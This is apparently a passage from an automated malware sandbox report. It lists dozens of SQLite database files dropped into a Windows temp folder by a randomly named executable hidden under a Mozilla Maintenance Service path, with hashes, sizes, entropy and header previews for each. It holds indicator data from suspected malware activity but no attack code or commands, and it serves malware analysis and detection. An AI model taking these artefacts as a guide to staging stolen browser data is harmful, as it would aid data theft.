                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\5nu40OM4wz

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\5qXZlOzc9V

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\5sN6JWhW0p

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\6K5uGLMor9

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\6hU7j2HS6o

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\700wWYL3Fv

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7IYnPHK187

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7NJ2lF9RlJ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\7dftRzn6yZ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\8J9Zbopzzz

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\8JsD5wb7T8

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):0.08235737944063153
                                                                    Encrypted:false
                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\8WVlnn4Kb4

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\8vsKrWqBfZ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\8xqhP5P511

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\8yAXZKSYXg

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\90AK8UVDXr

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\9KDAYXYM4e

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\AKDH41EzpE

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\AMKhQYWbJ2

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\AaBXJ6oAPG

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\AqRJktyTtQ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Ax2RQ9vTtb

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\B9jB8Guobv

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
